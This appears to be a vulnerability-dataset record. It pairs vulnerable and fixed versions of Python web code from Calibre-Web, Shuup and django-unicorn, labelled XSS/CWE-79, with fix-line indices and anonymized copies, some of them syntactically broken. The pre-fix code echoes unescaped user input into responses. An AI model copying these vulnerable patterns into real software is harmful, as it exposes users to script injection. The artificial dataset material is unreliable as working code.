# shortentitles to at longest nchar, shorten longer words if necessary
@jinjia.app_template_filter('shortentitle')
def shortentitle_filter(s, nchar=20):
text = s.split()
res = "" # result
suml = 0 # overall length
for line in text:
if suml >= 60:
res += '...'
break
# if word longer than 20 chars truncate line and append '...', otherwise add whole word to result
# string, and summarize total length to stop at chars given by nchar
if len(line) > nchar:
res += line[:(nchar-3)] + '[..] '
suml += nchar+3
else:
res += line + ' '
suml += len(line) + 1
return res.strip()
@jinjia.app_template_filter('mimetype')
def mimetype_filter(val):
return mimetypes.types_map.get('.' + val, 'application/octet-stream')
@jinjia.app_template_filter('formatdate')
def formatdate_filter(val):
try:
return format_date(val, format='medium', locale=get_locale())
except AttributeError as e:
log.error('Babel error: %s, Current user locale: %s, Current User: %s', e,
current_user.locale,
current_user.name
)
return val
@jinjia.app_template_filter('formatdateinput')
def format_date_input(val):
input_date = val.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if input_date == "0101-01-01" else input_date
@jinjia.app_template_filter('strftime')
def timestamptodate(date, fmt=None):
date = datetime.datetime.fromtimestamp(
int(date)/1000
)
native = date.replace(tzinfo=None)
if fmt:
time_format = fmt
else:
time_format = '%d %m %Y - %H:%S'
return native.strftime(time_format)
@jinjia.app_template_filter('yesno')
def yesno(value, yes, no):
return yes if value else no
@jinjia.app_template_filter('formatfloat')
def formatfloat(value, decimals=1):
value = 0 if not value else value
return ('{0:.' + str(decimals) + 'f}').format(value).rstrip('0').rstrip('.')
@jinjia.app_template_filter('formatseriesindex')
def formatseriesindex_filter(series_index):
if series_index:
try:
if int(series_index) - series_index == 0:
return int(series_index)
else:
return series_index
except ValueError:
return series_index
return 0
@jinjia.app_template_filter('uuidfilter')
def uuidfilter(var):
return uuid4()
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# custom jinja filters
from __future__ import division, print_function, unicode_literals
import datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask_babel import gettext as _
from flask import Blueprint, request, url_for
from flask_babel import get_locale
from flask_login import current_user
from markupsafe import escape
from . import logger
jinjia = Blueprint('jinjia', __name__)
log = logger.create()
# pagination links in jinja
@jinjia.app_template_filter('url_for_other_page')
def url_for_other_page(page):
args = request.view_args.copy()
args['page'] = page
for get, val in request.args.items():
args[get] = val
return url_for(request.endpoint, **args)
# shortentitles to at longest nchar, shorten longer words if necessary
@jinjia.app_template_filter('shortentitle')
def shortentitle_filter(s, nchar=20):
text = s.split()
res = "" # result
suml = 0 # overall length
for line in text:
if suml >= 60:
res += '...'
break
# if word longer than 20 chars truncate line and append '...', otherwise add whole word to result
# string, and summarize total length to stop at chars given by nchar
if len(line) > nchar:
res += line[:(nchar-3)] + '[..] '
suml += nchar+3
else:
res += line + ' '
suml += len(line) + 1
return res.strip()
@jinjia.app_template_filter('mimetype')
def mimetype_filter(val):
return mimetypes.types_map.get('.' + val, 'application/octet-stream')
@jinjia.app_template_filter('formatdate')
def formatdate_filter(val):
try:
return format_date(val, format='medium', locale=get_locale())
except AttributeError as e:
log.error('Babel error: %s, Current user locale: %s, Current User: %s', e,
current_user.locale,
current_user.name
)
return val
@jinjia.app_template_filter('formatdateinput')
def format_date_input(val):
input_date = val.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if input_date == "0101-01-01" else input_date
@jinjia.app_template_filter('strftime')
def timestamptodate(date, fmt=None):
date = datetime.datetime.fromtimestamp(
int(date)/1000
)
native = date.replace(tzinfo=None)
if fmt:
time_format = fmt
else:
time_format = '%d %m %Y - %H:%S'
return native.strftime(time_format)
@jinjia.app_template_filter('yesno')
def yesno(value, yes, no):
return yes if value else no
@jinjia.app_template_filter('formatfloat')
def formatfloat(value, decimals=1):
value = 0 if not value else value
return ('{0:.' + str(decimals) + 'f}').format(value).rstrip('0').rstrip('.')
@jinjia.app_template_filter('formatseriesindex')
def formatseriesindex_filter(series_index):
if series_index:
try:
if int(series_index) - series_index == 0:
return int(series_index)
else:
return series_index
except ValueError:
return series_index
return 0
@jinjia.app_template_filter('escapedlink')
def escapedlink_filter(url, text):
return "<a href='{}'>{}</a>".format(url, escape(text))
@jinjia.app_template_filter('uuidfilter')
def uuidfilter(var):
return uuid4()
| xss | {
"code": [],
"line_no": []
} | {
"code": [
"from flask_babel import gettext as _",
"from markupsafe import escape",
"@jinjia.app_template_filter('escapedlink')",
"def escapedlink_filter(url, text):"
],
"line_no": [
31,
35,
133,
134
]
} |
from __future__ import division, print_function, unicode_literals
import .datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask import Blueprint, request, url_for
from flask_babel import .get_locale
from flask_login import current_user
from . import .logger
VAR_0 = Blueprint('jinjia', __name__)
VAR_1 = logger.create()
@VAR_0.app_template_filter('url_for_other_page')
def FUNC_0(VAR_2):
VAR_14 = request.view_args.copy()
VAR_14['page'] = VAR_2
for VAR_20, VAR_5 in request.args.items():
VAR_14[VAR_20] = VAR_5
return url_for(request.endpoint, **VAR_14)
@VAR_0.app_template_filter('shortentitle')
def FUNC_1(VAR_3, VAR_4=20):
VAR_15 = VAR_3.split()
VAR_16 = "" # result
VAR_17 = 0 # overall length
for line in VAR_15:
if VAR_17 >= 60:
VAR_16 += '...'
break
if len(line) > VAR_4:
VAR_16 += line[:(VAR_4-3)] + '[..] '
VAR_17 += VAR_4+3
else:
VAR_16 += line + ' '
VAR_17 += len(line) + 1
return VAR_16.strip()
@VAR_0.app_template_filter('mimetype')
def FUNC_2(VAR_5):
return mimetypes.types_map.get('.' + VAR_5, 'application/octet-stream')
@VAR_0.app_template_filter('formatdate')
def FUNC_3(VAR_5):
try:
return format_date(VAR_5, format='medium', locale=get_locale())
except AttributeError as e:
VAR_1.error('Babel error: %VAR_3, Current user locale: %VAR_3, Current User: %s', e,
current_user.locale,
current_user.name
)
return VAR_5
@VAR_0.app_template_filter('formatdateinput')
def FUNC_4(VAR_5):
VAR_18 = VAR_5.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if VAR_18 == "0101-01-01" else VAR_18
@VAR_0.app_template_filter('strftime')
def FUNC_5(VAR_6, VAR_7=None):
VAR_6 = datetime.datetime.fromtimestamp(
int(VAR_6)/1000
)
VAR_19 = VAR_6.replace(tzinfo=None)
if VAR_7:
VAR_21 = VAR_7
else:
VAR_21 = '%d %m %Y - %H:%S'
return VAR_19.strftime(VAR_21)
@VAR_0.app_template_filter('yesno')
def FUNC_6(VAR_8, VAR_9, VAR_10):
return VAR_9 if VAR_8 else VAR_10
@VAR_0.app_template_filter('formatfloat')
def FUNC_7(VAR_8, VAR_11=1):
VAR_8 = 0 if not VAR_8 else VAR_8
return ('{0:.' + str(VAR_11) + 'f}').format(VAR_8).rstrip('0').rstrip('.')
@VAR_0.app_template_filter('formatseriesindex')
def FUNC_8(VAR_12):
if VAR_12:
try:
if int(VAR_12) - series_index == 0:
return int(VAR_12)
else:
return VAR_12
except ValueError:
return VAR_12
return 0
@VAR_0.app_template_filter('uuidfilter')
def FUNC_9(VAR_13):
return uuid4()
|
from __future__ import division, print_function, unicode_literals
import .datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask_babel import .gettext as _
from flask import Blueprint, request, url_for
from flask_babel import .get_locale
from flask_login import current_user
from markupsafe import escape
from . import .logger
VAR_0 = Blueprint('jinjia', __name__)
VAR_1 = logger.create()
@VAR_0.app_template_filter('url_for_other_page')
def FUNC_0(VAR_2):
VAR_16 = request.view_args.copy()
VAR_16['page'] = VAR_2
for VAR_21, VAR_5 in request.args.items():
VAR_16[VAR_21] = VAR_5
return url_for(request.endpoint, **VAR_16)
@VAR_0.app_template_filter('shortentitle')
def FUNC_1(VAR_3, VAR_4=20):
VAR_14 = VAR_3.split()
VAR_17 = "" # result
VAR_18 = 0 # overall length
for line in VAR_14:
if VAR_18 >= 60:
VAR_17 += '...'
break
if len(line) > VAR_4:
VAR_17 += line[:(VAR_4-3)] + '[..] '
VAR_18 += VAR_4+3
else:
VAR_17 += line + ' '
VAR_18 += len(line) + 1
return VAR_17.strip()
@VAR_0.app_template_filter('mimetype')
def FUNC_2(VAR_5):
return mimetypes.types_map.get('.' + VAR_5, 'application/octet-stream')
@VAR_0.app_template_filter('formatdate')
def FUNC_3(VAR_5):
try:
return format_date(VAR_5, format='medium', locale=get_locale())
except AttributeError as e:
VAR_1.error('Babel error: %VAR_3, Current user locale: %VAR_3, Current User: %s', e,
current_user.locale,
current_user.name
)
return VAR_5
@VAR_0.app_template_filter('formatdateinput')
def FUNC_4(VAR_5):
VAR_19 = VAR_5.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if VAR_19 == "0101-01-01" else VAR_19
@VAR_0.app_template_filter('strftime')
def FUNC_5(VAR_6, VAR_7=None):
VAR_6 = datetime.datetime.fromtimestamp(
int(VAR_6)/1000
)
VAR_20 = VAR_6.replace(tzinfo=None)
if VAR_7:
VAR_22 = VAR_7
else:
VAR_22 = '%d %m %Y - %H:%S'
return VAR_20.strftime(VAR_22)
@VAR_0.app_template_filter('yesno')
def FUNC_6(VAR_8, VAR_9, VAR_10):
return VAR_9 if VAR_8 else VAR_10
@VAR_0.app_template_filter('formatfloat')
def FUNC_7(VAR_8, VAR_11=1):
VAR_8 = 0 if not VAR_8 else VAR_8
return ('{0:.' + str(VAR_11) + 'f}').format(VAR_8).rstrip('0').rstrip('.')
@VAR_0.app_template_filter('formatseriesindex')
def FUNC_8(VAR_12):
if VAR_12:
try:
if int(VAR_12) - series_index == 0:
return int(VAR_12)
else:
return VAR_12
except ValueError:
return VAR_12
return 0
@VAR_0.app_template_filter('escapedlink')
def FUNC_9(VAR_13, VAR_14):
return "<a href='{}'>{}</a>".format(VAR_13, escape(VAR_14))
@VAR_0.app_template_filter('uuidfilter')
def FUNC_10(VAR_15):
return uuid4()
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
29,
34,
36,
37,
40,
41,
42,
50,
51,
52,
62,
63,
71,
72,
76,
77,
88,
89,
94,
95,
107,
108,
112,
113,
118,
119,
131,
135,
136,
137
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
29,
37,
38,
41,
42,
43,
51,
52,
53,
63,
64,
72,
73,
77,
78,
89,
90,
95,
96,
108,
109,
113,
114,
119,
120,
132,
136,
140,
141,
142
] |
1CWE-79
| # This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CheckoutProcess(object):
horizontal_template = True
def __init__(self, phase_specs, phase_kwargs, view=None):
"""
Initialize this checkout process.
:type phase_specs: list[str]
:type phase_kwargs: dict
:type view: shuup.front.checkout.BaseCheckoutView|None
"""
self.phase_specs = phase_specs
self.phase_kwargs = phase_kwargs
self.view = view
self.request = self.phase_kwargs.get("request")
@property
def phases(self):
"""
:rtype: Iterable[CheckoutPhaseViewMixin]
"""
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def instantiate_phase_class(self, phase_class, **extra_kwargs):
if not phase_class.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % phase_class)
kwargs = {}
kwargs.update(self.phase_kwargs)
kwargs.update(extra_kwargs)
phase = phase_class(checkout_process=self, horizontal_template=self.horizontal_template, **kwargs)
return phase
def _load_phases(self):
phases = OrderedDict()
for phase_spec in self.phase_specs:
phase_class = load(phase_spec)
phase = self.instantiate_phase_class(phase_class)
phases[phase_class.identifier] = phase
# check whether the phase spawns new phases,
# if so, then let's spawn then and add the phases
for spawned_phase in phase.spawn_phases(self):
phases[spawned_phase.identifier] = spawned_phase
return list(phases.values())
def get_current_phase(self, requested_phase_identifier):
found = False
for phase in self.phases:
if phase.is_valid():
phase.process()
if found or not requested_phase_identifier or requested_phase_identifier == phase.identifier:
found = True # We're at or past the requested phase
if not phase.should_skip():
return phase
if not phase.should_skip() and not phase.is_valid(): # A past phase is not valid, that's the current one
return phase
raise Http404("Error! Phase with identifier `%s` not found." % requested_phase_identifier) # pragma: no cover
def _get_next_phase(self, phases, current_phase, target_phase):
found = False
for phase in phases:
if phase.identifier == current_phase.identifier:
# Found the current one, so any valid phase from here on out is the next one
found = True
continue
if found and current_phase.identifier != target_phase.identifier:
return phase
if found and not phase.should_skip():
# Yep, that's the one
return phase
def get_next_phase(self, current_phase, target_phase):
return self._get_next_phase(self.phases, current_phase, target_phase)
def get_previous_phase(self, current_phase, target_phase):
return self._get_next_phase(reversed(self.phases), current_phase, target_phase)
def prepare_current_phase(self, phase_identifier):
current_phase = self.get_current_phase(phase_identifier)
self.add_phase_attributes(current_phase)
self.current_phase = current_phase
return current_phase
def add_phase_attributes(self, target_phase, current_phase=None):
"""
Add phase instance attributes (previous, next, etc) to the given target phase,
using the optional `current_phase` as the current phase for previous and next.
This is exposed as a public API for the benefit of phases that need to do sub-phase
initialization and dispatching, such as method phases.
"""
current_phase = current_phase or target_phase
target_phase.previous_phase = self.get_previous_phase(current_phase, target_phase)
target_phase.next_phase = self.get_next_phase(current_phase, target_phase)
target_phase.phases = self.phases
if current_phase in self.phases:
current_phase_index = self.phases.index(current_phase)
# Set up attributes that are handy for the phase bar in the templates.
for i, phase in enumerate(self.phases):
setattr(phase, "is_past", i > current_phase_index)
setattr(phase, "is_current", phase == current_phase)
setattr(phase, "is_future", i < current_phase_index)
setattr(phase, "is_previous", phase == target_phase.previous_phase)
setattr(phase, "is_next", phase == target_phase.next_phase)
return target_phase
def reset(self):
for phase in self.phases:
phase.reset()
def complete(self):
"""
To be called from a phase (`self.checkout_process.complete()`) when the checkout process is complete.
"""
self.reset()
def get_phase_url(self, phase):
# The self.view is optional for backward compatibility
if not self.view:
url_kwargs = {"phase": phase.identifier}
return reverse("shuup:checkout", kwargs=url_kwargs)
return self.view.get_phase_url(phase)
@property
def basket(self):
"""
The basket used in this checkout process.
:rtype: shuup.front.basket.objects.BaseBasket
"""
return get_basket(self.request)
class VerticalCheckoutProcess(CheckoutProcess):
horizontal_template = False
| # This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from django.utils.html import escape
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CheckoutProcess(object):
horizontal_template = True
def __init__(self, phase_specs, phase_kwargs, view=None):
"""
Initialize this checkout process.
:type phase_specs: list[str]
:type phase_kwargs: dict
:type view: shuup.front.checkout.BaseCheckoutView|None
"""
self.phase_specs = phase_specs
self.phase_kwargs = phase_kwargs
self.view = view
self.request = self.phase_kwargs.get("request")
@property
def phases(self):
"""
:rtype: Iterable[CheckoutPhaseViewMixin]
"""
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def instantiate_phase_class(self, phase_class, **extra_kwargs):
if not phase_class.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % phase_class)
kwargs = {}
kwargs.update(self.phase_kwargs)
kwargs.update(extra_kwargs)
phase = phase_class(checkout_process=self, horizontal_template=self.horizontal_template, **kwargs)
return phase
def _load_phases(self):
phases = OrderedDict()
for phase_spec in self.phase_specs:
phase_class = load(phase_spec)
phase = self.instantiate_phase_class(phase_class)
phases[phase_class.identifier] = phase
# check whether the phase spawns new phases,
# if so, then let's spawn then and add the phases
for spawned_phase in phase.spawn_phases(self):
phases[spawned_phase.identifier] = spawned_phase
return list(phases.values())
def get_current_phase(self, requested_phase_identifier):
found = False
for phase in self.phases:
if phase.is_valid():
phase.process()
if found or not requested_phase_identifier or requested_phase_identifier == phase.identifier:
found = True # We're at or past the requested phase
if not phase.should_skip():
return phase
if not phase.should_skip() and not phase.is_valid(): # A past phase is not valid, that's the current one
return phase
raise Http404("Error! Phase with identifier `%s` not found." % escape(requested_phase_identifier))
def _get_next_phase(self, phases, current_phase, target_phase):
found = False
for phase in phases:
if phase.identifier == current_phase.identifier:
# Found the current one, so any valid phase from here on out is the next one
found = True
continue
if found and current_phase.identifier != target_phase.identifier:
return phase
if found and not phase.should_skip():
# Yep, that's the one
return phase
def get_next_phase(self, current_phase, target_phase):
return self._get_next_phase(self.phases, current_phase, target_phase)
def get_previous_phase(self, current_phase, target_phase):
return self._get_next_phase(reversed(self.phases), current_phase, target_phase)
def prepare_current_phase(self, phase_identifier):
current_phase = self.get_current_phase(phase_identifier)
self.add_phase_attributes(current_phase)
self.current_phase = current_phase
return current_phase
def add_phase_attributes(self, target_phase, current_phase=None):
"""
Add phase instance attributes (previous, next, etc) to the given target phase,
using the optional `current_phase` as the current phase for previous and next.
This is exposed as a public API for the benefit of phases that need to do sub-phase
initialization and dispatching, such as method phases.
"""
current_phase = current_phase or target_phase
target_phase.previous_phase = self.get_previous_phase(current_phase, target_phase)
target_phase.next_phase = self.get_next_phase(current_phase, target_phase)
target_phase.phases = self.phases
if current_phase in self.phases:
current_phase_index = self.phases.index(current_phase)
# Set up attributes that are handy for the phase bar in the templates.
for i, phase in enumerate(self.phases):
setattr(phase, "is_past", i > current_phase_index)
setattr(phase, "is_current", phase == current_phase)
setattr(phase, "is_future", i < current_phase_index)
setattr(phase, "is_previous", phase == target_phase.previous_phase)
setattr(phase, "is_next", phase == target_phase.next_phase)
return target_phase
def reset(self):
for phase in self.phases:
phase.reset()
def complete(self):
"""
To be called from a phase (`self.checkout_process.complete()`) when the checkout process is complete.
"""
self.reset()
def get_phase_url(self, phase):
# The self.view is optional for backward compatibility
if not self.view:
url_kwargs = {"phase": phase.identifier}
return reverse("shuup:checkout", kwargs=url_kwargs)
return self.view.get_phase_url(phase)
@property
def basket(self):
"""
The basket used in this checkout process.
:rtype: shuup.front.basket.objects.BaseBasket
"""
return get_basket(self.request)
class VerticalCheckoutProcess(CheckoutProcess):
horizontal_template = False
| xss | {
"code": [],
"line_no": []
} | {
"code": [
" raise Http404(\"Error! Phase with identifier `%s` not found.\" % escape(requested_phase_identifier))"
],
"line_no": [
79
]
} |
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CLASS_0(object):
VAR_0 = True
def __init__(self, VAR_1, VAR_2, VAR_3=None):
self.phase_specs = VAR_1
self.phase_kwargs = VAR_2
self.view = VAR_3
self.request = self.phase_kwargs.get("request")
@property
def VAR_7(self):
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def FUNC_1(self, VAR_4, **VAR_5):
if not VAR_4.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % VAR_4)
VAR_12 = {}
kwargs.update(self.phase_kwargs)
VAR_12.update(VAR_5)
VAR_11 = VAR_4(checkout_process=self, VAR_0=self.horizontal_template, **VAR_12)
return VAR_11
def FUNC_2(self):
VAR_7 = OrderedDict()
for phase_spec in self.phase_specs:
VAR_4 = load(phase_spec)
VAR_11 = self.instantiate_phase_class(VAR_4)
VAR_7[VAR_4.identifier] = VAR_11
for VAR_16 in VAR_11.spawn_phases(self):
VAR_7[VAR_16.identifier] = VAR_16
return list(VAR_7.values())
def FUNC_3(self, VAR_6):
VAR_13 = False
for VAR_11 in self.phases:
if VAR_11.is_valid():
VAR_11.process()
if VAR_13 or not VAR_6 or VAR_6 == VAR_11.identifier:
VAR_13 = True # We're at or past the requested VAR_11
if not VAR_11.should_skip():
return VAR_11
if not VAR_11.should_skip() and not VAR_11.is_valid(): # A past VAR_11 is not valid, that's the current one
return VAR_11
raise Http404("Error! Phase with identifier `%s` not VAR_13." % VAR_6) # pragma: no cover
def FUNC_4(self, VAR_7, VAR_8, VAR_9):
VAR_13 = False
for VAR_11 in VAR_7:
if VAR_11.identifier == VAR_8.identifier:
VAR_13 = True
continue
if VAR_13 and VAR_8.identifier != VAR_9.identifier:
return VAR_11
if VAR_13 and not VAR_11.should_skip():
return VAR_11
def FUNC_5(self, VAR_8, VAR_9):
return self._get_next_phase(self.phases, VAR_8, VAR_9)
def FUNC_6(self, VAR_8, VAR_9):
return self._get_next_phase(reversed(self.phases), VAR_8, VAR_9)
def FUNC_7(self, VAR_10):
VAR_8 = self.get_current_phase(VAR_10)
self.add_phase_attributes(VAR_8)
self.current_phase = VAR_8
return VAR_8
def FUNC_8(self, VAR_9, VAR_8=None):
VAR_8 = VAR_8 or VAR_9
target_phase.previous_phase = self.get_previous_phase(VAR_8, VAR_9)
target_phase.next_phase = self.get_next_phase(VAR_8, VAR_9)
target_phase.phases = self.phases
if VAR_8 in self.phases:
VAR_14 = self.phases.index(VAR_8)
for i, VAR_11 in enumerate(self.phases):
setattr(VAR_11, "is_past", i > VAR_14)
setattr(VAR_11, "is_current", VAR_11 == VAR_8)
setattr(VAR_11, "is_future", i < VAR_14)
setattr(VAR_11, "is_previous", VAR_11 == VAR_9.previous_phase)
setattr(VAR_11, "is_next", VAR_11 == VAR_9.next_phase)
return VAR_9
def FUNC_9(self):
for VAR_11 in self.phases:
VAR_11.reset()
def FUNC_10(self):
self.reset()
def FUNC_11(self, VAR_11):
if not self.view:
VAR_15 = {"phase": VAR_11.identifier}
return reverse("shuup:checkout", VAR_12=VAR_15)
return self.view.get_phase_url(VAR_11)
@property
def FUNC_12(self):
return get_basket(self.request)
class CLASS_1(CLASS_0):
VAR_0 = False
|
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from django.utils.html import escape
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CLASS_0(object):
VAR_0 = True
def __init__(self, VAR_1, VAR_2, VAR_3=None):
self.phase_specs = VAR_1
self.phase_kwargs = VAR_2
self.view = VAR_3
self.request = self.phase_kwargs.get("request")
@property
def VAR_7(self):
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def FUNC_1(self, VAR_4, **VAR_5):
if not VAR_4.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % VAR_4)
VAR_12 = {}
kwargs.update(self.phase_kwargs)
VAR_12.update(VAR_5)
VAR_11 = VAR_4(checkout_process=self, VAR_0=self.horizontal_template, **VAR_12)
return VAR_11
def FUNC_2(self):
VAR_7 = OrderedDict()
for phase_spec in self.phase_specs:
VAR_4 = load(phase_spec)
VAR_11 = self.instantiate_phase_class(VAR_4)
VAR_7[VAR_4.identifier] = VAR_11
for VAR_16 in VAR_11.spawn_phases(self):
VAR_7[VAR_16.identifier] = VAR_16
return list(VAR_7.values())
def FUNC_3(self, VAR_6):
VAR_13 = False
for VAR_11 in self.phases:
if VAR_11.is_valid():
VAR_11.process()
if VAR_13 or not VAR_6 or VAR_6 == VAR_11.identifier:
VAR_13 = True # We're at or past the requested VAR_11
if not VAR_11.should_skip():
return VAR_11
if not VAR_11.should_skip() and not VAR_11.is_valid(): # A past VAR_11 is not valid, that's the current one
return VAR_11
raise Http404("Error! Phase with identifier `%s` not VAR_13." % escape(VAR_6))
def FUNC_4(self, VAR_7, VAR_8, VAR_9):
VAR_13 = False
for VAR_11 in VAR_7:
if VAR_11.identifier == VAR_8.identifier:
VAR_13 = True
continue
if VAR_13 and VAR_8.identifier != VAR_9.identifier:
return VAR_11
if VAR_13 and not VAR_11.should_skip():
return VAR_11
def FUNC_5(self, VAR_8, VAR_9):
return self._get_next_phase(self.phases, VAR_8, VAR_9)
def FUNC_6(self, VAR_8, VAR_9):
return self._get_next_phase(reversed(self.phases), VAR_8, VAR_9)
def FUNC_7(self, VAR_10):
VAR_8 = self.get_current_phase(VAR_10)
self.add_phase_attributes(VAR_8)
self.current_phase = VAR_8
return VAR_8
def FUNC_8(self, VAR_9, VAR_8=None):
VAR_8 = VAR_8 or VAR_9
target_phase.previous_phase = self.get_previous_phase(VAR_8, VAR_9)
target_phase.next_phase = self.get_next_phase(VAR_8, VAR_9)
target_phase.phases = self.phases
if VAR_8 in self.phases:
VAR_14 = self.phases.index(VAR_8)
for i, VAR_11 in enumerate(self.phases):
setattr(VAR_11, "is_past", i > VAR_14)
setattr(VAR_11, "is_current", VAR_11 == VAR_8)
setattr(VAR_11, "is_future", i < VAR_14)
setattr(VAR_11, "is_previous", VAR_11 == VAR_9.previous_phase)
setattr(VAR_11, "is_next", VAR_11 == VAR_9.next_phase)
return VAR_9
def FUNC_9(self):
for VAR_11 in self.phases:
VAR_11.reset()
def FUNC_10(self):
self.reset()
def FUNC_11(self, VAR_11):
if not self.view:
VAR_15 = {"phase": VAR_11.identifier}
return reverse("shuup:checkout", VAR_12=VAR_15)
return self.view.get_phase_url(VAR_11)
@property
def FUNC_12(self):
return get_basket(self.request)
class CLASS_1(CLASS_0):
VAR_0 = False
| [
1,
2,
3,
4,
5,
6,
8,
12,
16,
17,
20,
24,
33,
42,
51,
54,
59,
60,
61,
64,
66,
79,
84,
87,
90,
92,
94,
97,
100,
106,
111,
121,
129,
133,
139,
141,
146,
151,
155,
156,
159,
22,
23,
24,
25,
26,
27,
28,
36,
37,
38,
108,
109,
110,
111,
112,
113,
114,
135,
136,
137,
149,
150,
151,
152,
153
] | [
1,
2,
3,
4,
5,
6,
8,
13,
17,
18,
21,
25,
34,
43,
52,
55,
60,
61,
62,
65,
67,
80,
85,
88,
91,
93,
95,
98,
101,
107,
112,
122,
130,
134,
140,
142,
147,
152,
156,
157,
160,
23,
24,
25,
26,
27,
28,
29,
37,
38,
39,
109,
110,
111,
112,
113,
114,
115,
136,
137,
138,
150,
151,
152,
153,
154
] |
1CWE-79
| import logging
from django.template.response import TemplateResponse
from django.utils.safestring import mark_safe
import orjson
from bs4 import BeautifulSoup
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
logger = logging.getLogger(__name__)
class UnsortedAttributes(HTMLFormatter):
"""
Prevent beautifulsoup from re-ordering attributes.
"""
def attributes(self, tag: Tag):
for k, v in tag.attrs.items():
yield k, v
class UnicornTemplateResponse(TemplateResponse):
def __init__(
self,
template,
request,
context=None,
content_type=None,
status=None,
charset=None,
using=None,
component=None,
init_js=False,
**kwargs,
):
super().__init__(
template=template,
request=request,
context=context,
content_type=content_type,
status=status,
charset=charset,
using=using,
)
self.component = component
self.init_js = init_js
@timed
def render(self):
response = super().render()
if not self.component or not self.component.component_id:
return response
content = response.content.decode("utf-8")
frontend_context_variables = self.component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
checksum = generate_checksum(orjson.dumps(frontend_context_variables_dict))
soup = BeautifulSoup(content, features="html.parser")
root_element = get_root_element(soup)
root_element["unicorn:id"] = self.component.component_id
root_element["unicorn:name"] = self.component.component_name
root_element["unicorn:key"] = self.component.component_key
root_element["unicorn:checksum"] = checksum
# Generate the hash based on the rendered content (without script tag)
hash = generate_checksum(UnicornTemplateResponse._desoupify(soup))
if self.init_js:
init = {
"id": self.component.component_id,
"name": self.component.component_name,
"key": self.component.component_key,
"data": orjson.loads(frontend_context_variables),
"calls": self.component.calls,
"hash": hash,
}
init = orjson.dumps(init).decode("utf-8")
json_element_id = f"unicorn:data:{self.component.component_id}"
init_script = f"Unicorn.componentInit(JSON.parse(document.getElementById('{json_element_id}').textContent));"
json_tag = soup.new_tag("script")
json_tag["type"] = "application/json"
json_tag["id"] = json_element_id
json_tag.string = sanitize_html(init)
if self.component.parent:
self.component._init_script = init_script
self.component._json_tag = json_tag
else:
json_tags = []
json_tags.append(json_tag)
for child in self.component.children:
init_script = f"{init_script} {child._init_script}"
json_tags.append(child._json_tag)
script_tag = soup.new_tag("script")
script_tag["type"] = "module"
script_tag.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {init_script} }}"
root_element.insert_after(script_tag)
for t in json_tags:
root_element.insert_after(t)
rendered_template = UnicornTemplateResponse._desoupify(soup)
rendered_template = mark_safe(rendered_template)
self.component.rendered(rendered_template)
response.content = rendered_template
return response
@staticmethod
def _desoupify(soup):
soup.smooth()
return soup.encode(formatter=UnsortedAttributes()).decode("utf-8")
def get_root_element(soup: BeautifulSoup) -> Tag:
"""
Gets the first tag element.
Returns:
BeautifulSoup tag element.
Raises an Exception if an element cannot be found.
"""
for element in soup.contents:
if isinstance(element, Tag) and element.name:
return element
raise Exception("No root element found")
| import logging
from django.template.response import TemplateResponse
